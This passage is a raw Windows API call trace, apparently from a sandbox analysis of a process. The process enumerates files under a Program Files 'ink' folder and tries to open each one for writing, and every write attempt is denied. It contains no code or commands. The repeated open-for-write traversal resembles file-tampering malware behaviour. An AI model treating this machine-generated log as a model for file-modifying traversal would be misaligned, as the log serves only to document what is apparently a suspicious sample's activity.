cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE", lpUsedDefaultChar=0x0) returned 57 [0100.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0100.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.840] AreFileApisANSI () returned 1 [0100.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0100.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE") returned 57 [0100.840] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.840] GetLastError () returned 0x5 [0100.840] GetLastError () returned 0x5 [0100.840] SetLastError (dwErrCode=0x5) [0100.840] GetLastError () returned 0x5 [0100.840] SetLastError (dwErrCode=0x5) [0100.840] GetLastError () returned 0x5 [0100.840] SetLastError (dwErrCode=0x5) [0100.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0100.840] AreFileApisANSI () returned 1 [0100.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0100.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE") returned 57 [0100.840] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.841] GetLastError () returned 0x5 [0100.841] GetLastError () returned 0x5 [0100.841] SetLastError (dwErrCode=0x5) [0100.841] GetLastError () returned 0x5 [0100.841] SetLastError (dwErrCode=0x5) [0100.841] GetLastError () returned 0x5 [0100.841] SetLastError (dwErrCode=0x5) [0100.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0100.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0100.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0100.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0100.841] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe467a929, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe467a929, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0100.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0100.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0100.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0100.841] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x77fd0 [0100.842] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c820e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.842] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0100.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0100.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0100.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0100.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.843] AreFileApisANSI () returned 1 [0100.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0100.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.843] AreFileApisANSI () returned 1 [0100.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x851c0 [0100.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui") returned 73 [0100.843] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.843] GetFileType (hFile=0x27c) returned 0x1 [0100.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0100.844] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.844] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.844] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.844] CloseHandle (hObject=0x27c) returned 1 [0100.844] AreFileApisANSI () returned 1 [0100.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85c60 [0100.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui") returned 73 [0100.845] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.845] GetLastError () returned 0x5 [0100.845] GetLastError () returned 0x5 [0100.845] SetLastError (dwErrCode=0x5) [0100.845] GetLastError () returned 0x5 [0100.845] SetLastError (dwErrCode=0x5) [0100.845] GetLastError () returned 0x5 [0100.845] SetLastError (dwErrCode=0x5) [0100.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0100.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0100.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.845] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8ca48, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⠀")) returned 0 [0100.845] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0100.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0100.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0100.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0100.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0100.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0100.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0100.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0100.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0100.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0100.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0100.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.846] AreFileApisANSI () returned 1 [0100.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll", lpUsedDefaultChar=0x0) returned 64 [0100.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0100.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0100.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.846] AreFileApisANSI () returned 1 [0100.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0100.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0100.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6e250, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll") returned 64 [0100.847] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.849] GetFileType (hFile=0x368) returned 0x1 [0100.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0100.850] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.850] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.850] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.850] CloseHandle (hObject=0x368) returned 1 [0100.850] AreFileApisANSI () returned 1 [0100.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0100.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0100.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6ecf0, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll") returned 64 [0100.850] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.851] GetLastError () returned 0x5 [0100.851] GetLastError () returned 0x5 [0100.851] SetLastError (dwErrCode=0x5) [0100.851] GetLastError () returned 0x5 [0100.851] SetLastError (dwErrCode=0x5) [0100.851] GetLastError () returned 0x5 [0100.851] SetLastError (dwErrCode=0x5) [0100.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0100.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0100.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.851] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463d4edd, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x779da8e5, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463d4edd, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x3e9600, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="tabskb.dll", cAlternateFileName="")) returned 1 [0100.851] 